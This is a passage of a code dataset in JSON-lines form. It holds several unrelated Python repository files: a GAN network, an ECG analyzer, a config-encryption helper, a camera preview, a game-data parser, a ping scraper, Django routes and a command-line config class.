model.add(tf.keras.layers.Dropout(0.2))\n\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(1))\n\n return model\n\n\ncross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\n\n# def discriminator_loss(real_output, fake_output):\n# real_loss = cross_entropy(tf.ones_like(real_output), real_output)\n# fake_loss = cross_entropy(tf.zeros_like(fake_output), fake_output)\n# total_loss = real_loss + fake_loss\n# return total_loss\n#\n#\n# def generator_loss(fake_output):\n# return cross_entropy(tf.ones_like(fake_output), fake_output)\n\n\ndef critic_loss(label, output):\n return tf.keras.backend.mean(label*output)\n\n\ndef wasserstein_generator_loss(fake_output):\n return -tf.keras.backend.mean(fake_output)\n\n\n# clip model weights to a given hypercube\nclass ClipConstraint:\n # set clip value when initialized\n def __init__(self, clip_value):\n self.clip_value = clip_value\n\n # clip model weights to hypercube\n def __call__(self, weights):\n return tf.keras.backend.clip(weights, -self.clip_value, self.clip_value)\n\n # get the config\n def get_config(self):\n return {'clip_value': self.clip_value}\n\n\n\n\n","repo_name":"MichaelWheeler202/Image_GAN","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11600255756","text":"import math as m\nimport logging\nfrom ecgdetectors import Detectors\nimport json\nimport matplotlib.pyplot as plt\n\n\ndef analyze_data_file(filename):\n \"\"\"Read and format the inputted ecg data\n\n analyze_data_file takes in a raw .csv file that has a time and voltage\n comma delimited data set and reads in all data that is properly\n formatted into float arrays for a time and voltage separately.\n\n :param filename: The filename and path of the raw .csv ecg data on the\n local machine\n\n :returns: The time and voltage float arrays without any empty, nan,\n or string cells\n \"\"\"\n kickstart(filename)\n time = []\n voltage = []\n in_file = open(filename, 'r')\n keep_reading = True\n line_number = 0\n while keep_reading:\n data_line = in_file.readline()\n if data_line == \"\": # ok to use because will have at least a comma\n keep_reading = False\n else:\n line_number += 1\n append, time_point, voltage_point = \\\n process_line(data_line, line_number)\n if append is True:\n time.append(time_point)\n voltage.append(voltage_point)\n in_range(voltage_point, line_number)\n in_file.close()\n return time, voltage\n\n\ndef kickstart(filename):\n \"\"\"Log an info entry when starting to analyze a new data file\n\n kickstart is a function that merely logs an info note when starting to\n analyze a new ECG data file.\n\n :param filename: The filename including the entire path of the data file\n \"\"\"\n logging.info(\n \"The file {} has started analysis.\"\n .format(filename))\n\n\ndef in_range(voltage_point, line_number):\n \"\"\"Identify Voltage data outside +/- 300 mV\n\n in_range looks at a single float voltage data point to determine if it\n is within +/- 300mV. If the data point is outside this range, a warning\n is logged.\n\n :param voltage_point: The singular voltage data value\n :param line_number: The line number of the voltage point in raw data file\n \"\"\"\n if abs(voltage_point) > 300.0:\n logging.warning(\n \"The line {} has a voltage outside +/- 300 mV.\"\n .format(line_number))\n return\n\n\ndef process_line(data_line, line_no):\n \"\"\"Format the data line if numerical and proper data entry\n\n process_line takes in a string of a time and voltage data line. This\n string is process via three trial cases to ensure there is not\n a string, nan, or empty cell for the data. This is then either returned\n or a warning is lgged with the line number.\n\n :param data_line: String line of time and voltage data points\n :param line_no: Line number int of current line\n\n :returns: a boolean of True when no problems exist with data\n Either two strings of 0.0 or the float data points from the data line\n \"\"\"\n append = True\n data_points = data_line.strip(\"\\n\").split(\",\")\n time_point = data_points[0]\n voltage_point = data_points[1]\n if time_point == \"\" or voltage_point == \"\":\n logging.warning(\"The line {} has a missing time or voltage\".\n format(line_no))\n append = False\n time_point = \"0.0\"\n voltage_point = \"0.0\"\n return append, time_point, voltage_point\n time_nums = remove_period_neg(time_point)\n voltage_nums = remove_period_neg(voltage_point)\n try:\n if m.isnan(float(time_point)) is True or \\\n m.isnan(float(voltage_point)) is True:\n logging.warning(\"The line {} has a NaN \"\n \"time or voltage\".format(line_no))\n append = False\n time_point = \"0.0\"\n voltage_point = \"0.0\"\n return append, time_point, voltage_point\n except ValueError:\n if not (time_nums.isnumeric() and voltage_nums.isnumeric()):\n logging.warning(\"The line {} has a string\"\n \" time or voltage\".format(line_no))\n append = False\n time_point = \"0.0\"\n voltage_point = \"0.0\"\n return append, time_point, voltage_point\n return append, float(time_point), float(voltage_point)\n\n\ndef remove_period_neg(string_entry):\n \"\"\"Format a string to determine if the string isnumeric()\n\n remove_period_neg is a function that takes a string and removes any\n periods or dashes. Numerically, these represent a decimal point or a\n negative sign.\n\n :param string_entry: A string type of a time or voltage data point\n\n :returns: The final string with periods or dashes\n \"\"\"\n new_string = string_entry.replace(\".\", \"\").replace(\"-\", \"\")\n return new_string\n\n\ndef calculate_sampling_freq(time_array):\n \"\"\"Identify the Sampling Frequency for the Peak Detecting Module\n Implemented\n\n calculate_sampling frequency looks at two time data points to quantify\n the sampling frequency of the ECG data.\n\n :param time_array: The float array of all raw time points\n\n :returns: The sampling frequency or inverse of sampling period\n \"\"\"\n dt = time_array[1]-time_array[0]\n fs = 1/dt\n return fs\n\n\ndef calculate_total_time(time_array):\n \"\"\"Identify the length of time of the data file\n\n calculate_total_time finds the differences in time between the first\n and last array entries to find the total time. This is logged after\n finishing to illustrate the code status.\n\n :param time_array: The formatted time input data from the ECG file\n\n :returns: The length of time float of the time array\n \"\"\"\n total_time = time_array[-1]-time_array[0]\n logging.info(\"The total time has been calculated\")\n return total_time\n\n\ndef calculate_min_max(voltage_array):\n \"\"\"Find the min and max voltages\n\n calculate_min_max uses the min and max functions in python\n to identify the largest and smallest (including negatives)\n voltage data points. This is then logged.\n\n :param voltage_array: The formatted voltage input data from the ECG file\n in mV\n\n :returns: a tuple of the float min and max\n voltages\n \"\"\"\n max_voltage = max(voltage_array)\n min_voltage = min(voltage_array)\n logging.info(\"The min and max voltages have been calculated\")\n return (min_voltage, max_voltage)\n\n\ndef find_peak_attributes(voltage_array, time_array):\n \"\"\"Identify the Peak Indexes and Number of Peaks\n\n find_peak_attributes implements the two_average_detector function to\n identify the index points of each R peak. The resultant array length\n represents the number of peaks. This is then logged.\n\n :param voltage_array: The formatted voltage input data array\n :param time_array: The formatted time input data array\n\n :return: an array of index values for when the peaks occur and an int\n quantity of the number of peaks.\n \"\"\"\n detectors = Detectors(calculate_sampling_freq(time_array))\n r_peaks = detectors.two_average_detector(voltage_array)\n num_peaks = len(r_peaks)\n logging.info(\"The number of peaks has been calculated\")\n return r_peaks, num_peaks\n\n\ndef find_peak_times(time_array, peak_array):\n \"\"\"Identify the time points when peaks occur\n\n find_peak_times searches for the time points in the time_array\n that correspond to the index values of the peaks. This is then logged.\n\n :param time_array: The formatted time input data array\n :param peak_array: The array of peak index locations\n\n :returns: An array of float time values for when the peaks occurred\n \"\"\"\n peak_times = []\n for i in range(len(peak_array)):\n peak_times.append(time_array[peak_array[i]])\n logging.info(\"The peak times have been calculated\")\n return peak_times\n\n\ndef find_mean_hr(num_peaks, peak_times):\n \"\"\"Identify the heartrate in bpm\n\n find_mean_hr Divides the time between the outer most R peaks by the\n number of peaks to determine the average heart rate. This is then scaled\n to bpm and logged.\n\n :param num_peaks: The int number of peaks in the data set\n :param peak_times: The array of times corresponding to each R peak\n\n :returns: The float of the mean heart rate\n \"\"\"\n time_diff_between_peaks = peak_times[-1]-peak_times[0]\n time_in_min = time_diff_between_peaks/60\n mean_hr = num_peaks/time_in_min\n logging.info(\"The mean hr has been calculated\")\n return mean_hr\n\n\ndef create_out_dict(time_array, voltage_array):\n \"\"\"Create a dictionary with all specified outputs\n\n create_out_dict runs the calculation functions for all of the desired\n metrics. This is followed by adding these metrics to a dictionary and\n calling a function to log the status.\n\n :param time_array: The formatted time input data array\n :param voltage_array: The formatted voltage input data array\n\n :returns: a dictionary of desired outputs from ECG analysis\n \"\"\"\n duration = calculate_total_time(time_array)\n voltage_extremes = calculate_min_max(voltage_array)\n num_beats = find_peak_attributes(voltage_array, time_array)[1]\n peaks = find_peak_attributes(voltage_array, time_array)[0]\n beats = find_peak_times(time_array, peaks)\n mean_hr_bpm = find_mean_hr(num_beats, beats)\n\n metrics = {\n \"duration\": duration,\n \"voltage_extremes\": voltage_extremes,\n \"num_beats\": num_beats,\n \"mean_hr_bpm\": mean_hr_bpm,\n \"beats\": beats,\n }\n dict_log()\n return metrics\n\n\ndef dict_log():\n \"\"\"Log info after creating dictionary\n\n dict_log creates a log entry to be called after writing metrics to a\n dictionary.\n \"\"\"\n logging.info(\"The dictionary has been filled with data values\")\n\n\ndef output_json(dictionary, filename):\n \"\"\"Create a .json with the metrics dictionary\n\n output_json merely takes a dictionary of metrics and creates a .json as\n the desired output format.\n\n :param dictionary: The metrics dictionary\n :param filename: The string name of the filename\n \"\"\"\n new_name = filename.strip(\".csv\")+\".json\"\n out_file = open(new_name, \"w\")\n json.dump(dictionary, out_file)\n out_file.close()\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(filename=\"log_example\", level=logging.INFO)\n filename = \"test_data23.csv\"\n path = \"/Users/benrandoing/Documents/BME_547\" \\\n \"/class_repos/ecg-analysis-benrandoing20/\" \\\n \"test_data/\"+filename\n time, voltage = analyze_data_file(path)\n # plt.plot(time,voltage)\n # plt.show()\n metrics = create_out_dict(time, voltage)\n output_json(metrics, filename)\n","repo_name":"benrandoing20/Patient-Monitoring-Server-Client","sub_path":"ecg_cont_processor.py","file_name":"ecg_cont_processor.py","file_ext":"py","file_size_in_byte":10508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22977565093","text":"#!/usr/bin/python\nimport os\nimport random\nimport re\nimport string\nimport json\nfrom pathlib import Path\nimport Crypto\nfrom Crypto.Cipher.PKCS1_OAEP import PKCS1OAEP_Cipher\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Cipher import AES, PKCS1_OAEP\nfrom configobj import ConfigObj\n\n\nclass Messenger:\n def __init__(self):\n self.session_key = None\n self.cipher_rsa: RSA.RsaKey = None\n self.enc_session_key: PKCS1OAEP_Cipher = None\n # self.cipher_aes = None\n self.ciphertext, self.tag = (\"\", \"\")\n self.security_manager = None\n self.config = None\n self.config_dictionary: dict = None\n self.configfile = ''.join(str(Path(os.getcwd()).parent) + f\"\\\\src\\\\security\\\\config.bin\")\n self.keyfile = ''.join(str(Path(os.getcwd()).parent) + f\"\\\\src\\\\security\\\\private_key.pem\")\n\n def init(self, keyfile=\"private_key.pem\", configfile=\"config.bin\"):\n self.keyfile = keyfile\n self.configfile = configfile\n if configfile is \"config.bin\":\n if self.unlock_file(self.keyfile):\n self.session_key = self.get_session(self.keyfile)\n # Encrypt the session key with the public RSA key\n self.cipher_rsa = RSA.import_key(self.session_key._key)\n self.lock_file(self.keyfile)\n self.lock_file(self.keyfile)\n self.config = self.load_config(configfile=self.configfile, keyfile=self.keyfile)\n\n def update_config(self, config: ConfigObj):\n try:\n self.config_dictionary = dict({\n \"MONGO_SERVER\": config['cloud.mongodb']['connection_url'],\n \"DATABASES\": config['cloud.mongodb']['databases'],\n \"CRED_USER\": config['cloud.mongodb']['credential_manager']['username'],\n \"CRED_PASSWORD\": config['cloud.mongodb']['credential_manager']['password'],\n \"JOB_MANAGER_ID\": config['cloud.mongodb']['job_manager']['username'],\n \"JOB_MANAGER_PASS\": config['cloud.mongodb']['job_manager']['password'],\n \"SCRAPER_ACCOUNT\": config['cloud.mongodb']['scraperadmin'],\n \"PROXY\": config['proxy'],\n \"KEYMANAGER\": config['keymanager']\n })\n except Exception as e:\n return False\n return self.config_dictionary\n\n def encrypt_file(self, datafile: str, fileout: str):\n data = open(datafile, \"rb\").read()\n file_out = open(f\"{os.getcwd()}\\\\src\\\\security\\\\{fileout}.bin\", \"wb\")\n recipient_key = RSA.import_key(f\"{self.session_key._key}\".encode(\"utf-8\"))\n random_key = get_random_bytes(16)\n\n # Encrypt the session key with the public RSA key\n cipher_rsa = PKCS1_OAEP.new(recipient_key)\n enc_session_key = cipher_rsa.encrypt(random_key)\n\n # Encrypt the data with the AES session key\n cipher_aes = AES.new(random_key, AES.MODE_EAX)\n ciphertext, tag = cipher_aes.encrypt_and_digest(data)\n [file_out.write(x) for x in (enc_session_key, cipher_aes.nonce, tag, ciphertext)]\n\n def get_session(self, keyfile=\"private_key.pem\"):\n if self.unlock_file(keyfile):\n session: PKCS1OAEP_Cipher = PKCS1_OAEP.new(open(keyfile).read())\n self.lock_file(keyfile)\n return session\n\n def unlock_file(self, filename):\n try:\n os.system(f\"chmod 644 {filename}\")\n return True\n except Exception as e:\n print(e)\n return False\n\n def lock_file(self, filename):\n try:\n os.system(f\"chmod 644 {filename}\")\n except Exception as e:\n print(e)\n return False\n\n def decrypt_data(self, data):\n session = self.get_session(self.keyfile)\n rsa_key = RSA.importKey(session._key)\n enc_session_key, nonce, tag, ciphertext = \\\n [data.read(x) for x in (session._key.size_in_bytes(), 16, 16, -1)]\n # Decrypt the session key with the private RSA key\n cipher_rsa = PKCS1_OAEP.new(session)\n session_key = cipher_rsa.decrypt(enc_session_key)\n\n # Decrypt the data with the AES session key\n cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)\n data = cipher_aes.decrypt_and_verify(ciphertext, tag)\n print(data.decode(\"utf-8\"))\n\n def decrypt_file(self, datafile):\n try:\n datafile = open(datafile, \"rb\")\n private_key = RSA.import_key(f\"{self.session_key._key}\".encode(\"utf-8\"))\n enc_session_key, nonce, tag, ciphertext = \\\n [datafile.read(x) for x in (private_key.size_in_bytes(), 16, 16, -1)]\n # Decrypt the session key with the private RSA key\n cipher_rsa = PKCS1_OAEP.new(private_key)\n session_key = cipher_rsa.decrypt(enc_session_key)\n\n # Decrypt the data with the AES session key\n cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)\n data = cipher_aes.decrypt_and_verify(ciphertext, tag)\n return data\n\n except Exception as e:\n print(e)\n return False\n\n def load_config(self, configfile=\"config.bin\", keyfile=\"private_key.pem\"):\n\n if re.search(\"(?<=\\w)*(bin)\", configfile):\n config_data = self.decrypt_file(datafile=configfile)\n try:\n temp_file = ''.join(random.choice(string.ascii_lowercase) for x in range(10)) + \".tmp\"\n with open(f\"{str(Path(os.getcwd()))}\" + f\"\\\\src\\\\security\\\\{temp_file}\", \"wb\") as writeout:\n writeout.write(config_data)\n\n config = ConfigObj(f\"{str(Path(os.getcwd()))}\" + f\"\\\\src\\\\security\\\\{temp_file}\")\n self.config = config\n self.update_config(config)\n os.system(\"rm \" + f\"{str(Path(os.getcwd()))}\" + f\"\\\\src\\\\security\\\\{temp_file}\")\n return config\n except Exception as e:\n print(e)\n os.system(\"rm \" + f\"{str(Path(os.getcwd()))}\" + f\"\\\\src\\\\security\\\\{temp_file}\")\n return False\n else:\n config = ConfigObj(f\"{configfile}\")\n if self.update_config(config):\n return config\n else:\n print(\"No configurations found for session!\")\n return False\n\n\ndef main():\n print(\"main\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"charly-sen/Archive-Networker","sub_path":"src/security/key_services.py","file_name":"key_services.py","file_ext":"py","file_size_in_byte":6502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1364413083","text":"import numpy as np\nimport cv2\nfrom picamera2 import Picamera2\n\ncv2.startWindowThread()\n\n# cap = cv2.VideoCapture(0)\npicam2 = Picamera2()\npicam2.configure(picam2.create_preview_configuration(main={\"format\": 'RGB888', \"size\": (640, 480)}))\npicam2.start()\n\nwhile(True):\n # ret, frame = cap.read()\n frame = picam2.capture_array()\n #frame = cv2.flip(frame, -1)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n cv2.imshow('frame', frame)\n cv2.imshow('gray', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# cap.release()\ncv2.destroyAllWindows()","repo_name":"ngGuerrilla/balltracker","sub_path":"src/start_preview_gray_and_color.py","file_name":"start_preview_gray_and_color.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30172543056","text":"import json\n\nf = open('lol.json')\ndata = json.load(f)\n\ninfo = data['info']\n\nframes = data[\"info\"][\"frames\"]\n\nevents = []\n\ntimelineInfo = [] # This list will include objects with x position, y position, timestamp\n\neventsWithPos = []\n\n\n# Loop and Save the event list\nfor i in range(len(frames)):\n events.append(frames[i]['events'])\n\n # Looping through events, save position,\n # timestamp and its relevant event\n for j in range(len(events[i])):\n try:\n if events[i][j]['position']:\n eventsWithPos.append(events[i][j])\n except KeyError:\n continue\n\nplayer9PosTime = []\nplayer9Time = []\n\ndef add_Info():\n player9PosTime.append(eventsWithPos[i]['position'])\n player9Time.append(eventsWithPos[i]['timestamp'])\n\n\n# Find out the timestamp and position info when any events happened to the player 9\n# for i in range(len(eventsWithPos)):\n# for j in range(10):\n# try:\n# if eventsWithPos[i]['killerId'] == j+1:\n# add_Info()\n# continue\n#\n# if eventsWithPos[i]['victimId'] == j+1:\n# add_Info()\n# continue\n#\n# for k in range(len(eventsWithPos[i]['assistingParticipantIds'])):\n# if eventsWithPos[i]['assistingParticipantIds'][j] == j+1:\n# add_Info()\n# continue\n#\n# for k in range(len(eventsWithPos[i]['victimDamageDealt'])):\n# if eventsWithPos[i]['victimDamageDealt'][j] == j+1:\n# add_Info()\n# continue\n#\n# for k in range(len(eventsWithPos[i]['victimDamageReceived'])):\n# if eventsWithPos[i]['victimDamageReceived'][j] == j+1:\n# add_Info()\n# continue\n# except KeyError:\n# pass\n#\n# # Cleaning the data\n# for l in range(len(player9PosTime)):\n# player9PosTime[l]['timestamp'] = player9Time[l]\n# participantFrame = []\n# participantFrame.append(frames[0][\"participantFrames\"]) # 0 as var\n# print(participantFrame[0]['1']['position']) # 0 as constant, '1' var\n\n# Get player9's position and timestamps based on 60s' interval\nfor i in range(len(frames)):\n participantFrame = [frames[i][\"participantFrames\"]]\n\n for j in range(10):\n timelineInfo.append(participantFrame[0][str(j+1)]['position'])\n\n # timelineInfo[i]['timestamp'] = frames[i][\"timestamp\"]\n\nid = 1\n\n# insert pos / i*25+i\ntimelineInfo[i]['timestamp'] = frames[i][\"timestamp\"]\n\nfor i in range(len(timelineInfo)):\n # position i+1, index i\n if id > 10:\n id = 1\n if id <= 10:\n timelineInfo[i]['playerId'] = id\n id = id + 1\n\n # timelineInfo[i]['timestamp'] = frames[i][\"timestamp\"]\n\nprint(timelineInfo)\n\n# Insert player9's position and time into timelineInfo\n\n# for i in range(len(player9PosTime)):\n# timelineInfo.append(player9PosTime[i])\n\n# Ordering it based on the timestamp\n\n# timelineInfo.sort(key=lambda x:x['timestamp'])\n\n# print(timelineInfo)\n\n# jsonString = json.dumps(timelineInfo)\n# jsonFile = open(\"combinedData.json\", \"w\")\n# jsonFile.write(jsonString)\n# jsonFile.close()","repo_name":"kratewong/MOBA_Data_Analysis","sub_path":"analyzeTwo.py","file_name":"analyzeTwo.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12502124045","text":"from util import *\nfrom mode import create_train_data, train_regression, estimation\n\ntitle()\nmode = \"\"\nENDCODE = \"4\"\n\nwhile mode != ENDCODE :\n mode = menu()\n if mode == \"1\":\n create_train_data()\n elif mode == \"2\":\n train_regression()\n elif mode == \"3\":\n estimation()\n\n\n\nprint(\"\\n프로그램이 종료되었습니다.\")\n","repo_name":"heech912/Machine_Learning_Project_HU_2020A","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34052873443","text":"'''\nimport re\nx=raw_input('Enter string')\n#m=re.search('.*= (.*)/(.*)/(.*)/(.*) ms',x)\n#print m.group(2)\n\n\nx=raw_input('Enter string')\nm=re.search('(.*),(.*), (.*)% packet loss',x)\nprint m.group(3)\n'''\n\nimport re\nimport requests\nfrom requests.auth import HTTPProxyAuth\n\nURL = \"http://www.spfld.com/cgi-bin/ping\"\nip = input(\"ip\")\nonvar = \"on\"\nct = 10\nsz = 64\nPARAMS = {'remote_host':ip,'dns':onvar,'count':ct,'size':sz}\n\nproxyDict = { 'http' : '172.16.115.24:3128', 'https' : '172.16.115.24:3128' } \nauth = HTTPProxyAuth('mitansh', 'pass')\n\nf = open(ip+'.txt','w')\n\navg=0\nf.write(\"Attempt\")\nfor run in range(0, 20):\n\tr = requests.get(url = URL, params = PARAMS, proxies=proxyDict, auth=auth)\n\tinp = r.text\n\tlis = inp.splitlines()\n\tm=re.search('.*= (.*)/(.*)/(.*)/(.*) ms',lis[4])\n\tm.group(2)\n\tk=re.search('(.*),(.*), (.*)% packet loss',lis[3])\n\tf.write(m.group(2)+\"\\n\"+k.group(3)+\"\\n\")\n\tavg+=float(m.group(2))\n\nf.write(\"avg=\"+str(avg)+\"\\n\")\n\nf.close()","repo_name":"rohanaggarwal7997/Networks-Lab-","sub_path":"Ass1/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7806365829","text":"from django.urls import path\nfrom . import views\nfrom .views import *\n\nurlpatterns = [\n \n path('',views.home, name='home'),\n path('signup/',views.Signup,name='signup'),\n path('login/', views.User_login, name='login'),\n path('logout/', views.user_logout, name='logout'),\n path('profile/', views.profile, name='profile'),\n path('jobs/',views.jobs, name='jobs'),\n path('updateprofile//', views.update_profile, name='updateprofile'),\n path('employer//',views.employer_mode, name='employer'),\n path('add_job/',views.add_job, name=\"addJob\"),\n path('add_experience',views.add_experience, name=\"addExp\"),\n path('add_certification',views.add_certification,name=\"addCertification\"),\n path('apply_job/',views.apply_job, name='applyjob'),\n \n]\n","repo_name":"NIrajan-15/Blue-Collar","sub_path":"App/Job/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71132128250","text":"# *-* coding: utf-8 *-*\nimport logging\nfrom optparse import OptionParser\nimport platform\nimport os\n\nimport lib_dd.version as version\nimport NDimInv.data_weighting as data_weighting\n\n\nclass cfg_base(dict):\n\n class cfg_obj(object):\n def __init__(self, type, help, cmd_dict, possible_values=None):\n self.type = type\n self.help_text = help\n self.cmd_dict = cmd_dict\n self.possible_values = possible_values\n\n def __init__(self):\n self.web_order = [\n 'nr_terms_decade',\n ]\n\n # these options will not be shown in the web interface\n self.web_blacklist = [\n 'version',\n 'frequency_file',\n 'data_file',\n 'output_dir',\n 'nr_cores',\n 'silent',\n 'output_format',\n 'use_tmp',\n 'data_format',\n ]\n\n # will store the command line parser object\n self.cmd_parser = None\n # store the cfg objects here\n self.cfg = {}\n\n # add the actual configs here\n self['frequency_file'] = 'frequencies.dat'\n self.cfg['frequency_file'] = self.cfg_obj(\n type='string',\n help='Frequency file',\n cmd_dict={\n 'short': '-f',\n 'long': '--frequency_file',\n 'metavar': 'FILE',\n }\n )\n\n self['ignore_frequencies'] = None\n self.cfg['ignore_frequencies'] = self.cfg_obj(\n type='string',\n help=''.join((\n 'Frequency ids to ignore, example:',\n \"12,13,14\",\n '. Starts with index 0.',\n )),\n cmd_dict={\n 'short': None,\n 'long': '--ignore',\n 'metavar': 'STRING',\n },\n\n )\n\n self['data_fmin'] = None\n self.cfg['data_fmin'] = self.cfg_obj(\n type='float',\n help=''.join((\n 'Ignore frequencies below this value',\n )),\n cmd_dict={\n 'short': None,\n 'long': '--fmin',\n 'metavar': 'FLOAT',\n },\n )\n\n self['data_fmax'] = None\n self.cfg['data_fmax'] = self.cfg_obj(\n type='float',\n help=''.join((\n 'Ignore frequencies above this value',\n )),\n cmd_dict={\n 'short': None,\n 'long': '--fmax',\n 'metavar': 'FLOAT',\n },\n )\n\n self['plot_spectra'] = False\n self.cfg['plot_spectra'] = self.cfg_obj(\n type='bool',\n help='Plot final iterations (default: False)',\n cmd_dict={\n 'short': '-p',\n 'long': '--plot',\n 'action': 'store_true',\n },\n\n )\n\n self['data_file'] = 'data.dat'\n self.cfg['data_file'] = self.cfg_obj(\n type='string',\n help='data file',\n cmd_dict={\n 'short': '-d',\n 'long': '--data_file',\n 'metavar': 'FILE'\n },\n )\n\n self['data_format'] = 'rmag_rpha'\n self.cfg['data_format'] = self.cfg_obj(\n type='string',\n help=''.join((\n 'Input data format, possible values are: ',\n 'rmag_rpha, lnrmag_rpha, log10rmag_rpha, rmag_rpha, ',\n ' rre_rim rre_rmim, cmag_cpha, cre_cim, cre_cmim. ',\n '\"r\" stands for resistance/',\n 'resistivity, and \"c\" stands for conductance/',\n 'conductivity',\n )),\n cmd_dict={\n 'short': None,\n 'long': '--data_format',\n 'metavar': 'FORMAT',\n },\n possible_values=[\n 'rmag_rpha',\n 'cre_cim',\n ],\n )\n\n self['nr_terms_decade'] = 20\n self.cfg['nr_terms_decade'] = self.cfg_obj(\n type='int',\n help=\"Number of polarization terms per frequency decade\",\n cmd_dict={\n 'short': '-n',\n 'long': '--nr_terms',\n 'metavar': 'INT',\n },\n )\n\n self['output_dir'] = 'results'\n self.cfg['output_dir'] = self.cfg_obj(\n type='string',\n help='Output directory',\n cmd_dict={\n 'short': '-o',\n 'long': '--output',\n 'metavar': 'DIR',\n }\n )\n\n self['plot_spectra'] = False\n self.cfg['plot_spectra'] = self.cfg_obj(\n type='bool',\n help='Plot final iterations',\n cmd_dict={\n 'short': '-p',\n 'long': '--plot',\n 'action': 'store_true',\n },\n )\n\n self['plot_reg_strength'] = False\n self.cfg['plot_reg_strength'] = self.cfg_obj(\n type='bool',\n help='Plot regularization strengths of final iterations',\n cmd_dict={\n 'short': None,\n 'long': '--plot_reg_strength',\n 'action': 'store_true',\n },\n )\n\n self['plot_it_spectra'] = False\n self.cfg['plot_it_spectra'] = self.cfg_obj(\n type='bool',\n help='Plot spectra of each iteration',\n cmd_dict={\n 'short': '-i',\n 'long': '--plot_its',\n 'action': 'store_true',\n }\n )\n\n self['silent'] = False\n self.cfg['silent'] = self.cfg_obj(\n type='bool',\n help='Do not plot any logs to STDOUT',\n cmd_dict={\n 'short': None,\n 'long': '--silent',\n 'action': 'store_true',\n }\n )\n\n self['use_tmp'] = False\n self.cfg['use_tmp'] = self.cfg_obj(\n type='bool',\n help=''.join((\n \"Create the output in a temporary directory and \",\n \"later move it later to its destination\",\n )),\n cmd_dict={\n 'short': None,\n 'long': '--tmp',\n 'action': 'store_true',\n }\n )\n\n self['tausel'] = 'data_ext'\n self.cfg['tausel'] = self.cfg_obj(\n type='string',\n help=''.join((\n \"Tau selection strategy:\\ndata: Use \",\n \"data frequency limits for tau selection\\ndata_ext \",\n \"(default): Extend tau ranges by one frequency decade \",\n \"compared to the 'data' strategy. Factors can be set \",\n \"for the low and high frequency by separating with a \",\n \"',': LEFT,RIGHT, e.g. '10,100'\"\n )),\n cmd_dict={\n 'short': None,\n 'long': '--tausel',\n 'metavar': 'STRATEGY',\n },\n )\n\n self['norm'] = None\n self.cfg['norm'] = self.cfg_obj(\n type='float',\n help=''.join((\n 'Normalize lowest frequency real part to this value',\n )),\n cmd_dict={\n 'short': None,\n 'long': '--norm',\n 'metavar': 'FLOAT',\n },\n )\n\n self['plot_lambda'] = None\n self.cfg['plot_lambda'] = self.cfg_obj(\n type='int',\n help=''.join((\n \"Plot the l-curve for a selected iteration. \",\n \"WARNING: This only plots the l-curve and does not \",\n \"use it in the inversion process. Use -1 for last \",\n \"iteration.\",\n )),\n cmd_dict={\n 'short': None,\n 'long': '--plot_lcurve',\n 'metavar': 'INT',\n },\n )\n\n self['max_iterations'] = 20\n self.cfg['max_iterations'] = self.cfg_obj(\n type='int',\n help='Maximum number of iterations',\n cmd_dict={\n 'short': None,\n 'long': '--max_it',\n 'metavar': 'INT',\n },\n )\n\n self['version'] = False\n self.cfg['version'] = self.cfg_obj(\n type='bool',\n help='Print version information',\n cmd_dict={\n 'short': '-v',\n 'long': '--version',\n 'action': 'store_true',\n },\n )\n\n self['output_format'] = 'ascii_audit'\n self.cfg['output_format'] = self.cfg_obj(\n type='string',\n help='Output format(ascii| ascii_audit)',\n cmd_dict={\n 'short': None,\n 'long': '--output_format',\n 'metavar': 'STRING',\n },\n )\n\n self['data_weighting'] = 're_vs_im'\n self.cfg['data_weighting'] = self.cfg_obj(\n type='string',\n help='Data weighting scheme to use.',\n cmd_dict={\n 'short': None,\n 'long': '--data_weighting',\n 'metavar': 'SCHEME',\n },\n possible_values=sorted(data_weighting.functions.keys()),\n )\n\n def get_cmd_parser(self):\n parser = OptionParser()\n for key in sorted(self.cfg.keys()):\n helptext = ''.join((\n self.cfg[key].help_text,\n ' (default: ',\n '{0}'.format(self[key]) + ')'\n ))\n opts = {\n 'type': self.cfg[key].type,\n 'dest': key,\n 'help': helptext,\n 'default': self[key],\n }\n\n # if self[key] is None:\n # opts['default'] = None\n\n for label in ('action', 'metavar'):\n if label in self.cfg[key].cmd_dict:\n opts[label] = self.cfg[key].cmd_dict[label]\n\n if 'action' in opts:\n del(opts['type'])\n\n if self.cfg[key].cmd_dict['short'] is not None:\n lso = [self.cfg[key].cmd_dict['short'], ]\n else:\n lso = []\n\n lso.append(self.cfg[key].cmd_dict['long'])\n\n parser.add_option(\n *lso,\n **opts\n )\n\n self.cmd_parser = parser\n return parser\n\n def parse_cmd_arguments(self):\n \"\"\"\n Parse the command line arguments and update the dictionary\n \"\"\"\n if self.cmd_parser is None:\n self.get_cmd_parser()\n\n (options, args) = self.cmd_parser.parse_args()\n\n # multi threading does not work on Windows\n if platform.system() == \"Windows\":\n options.nr_cores = 1\n\n # print version information if requested\n if options.version:\n 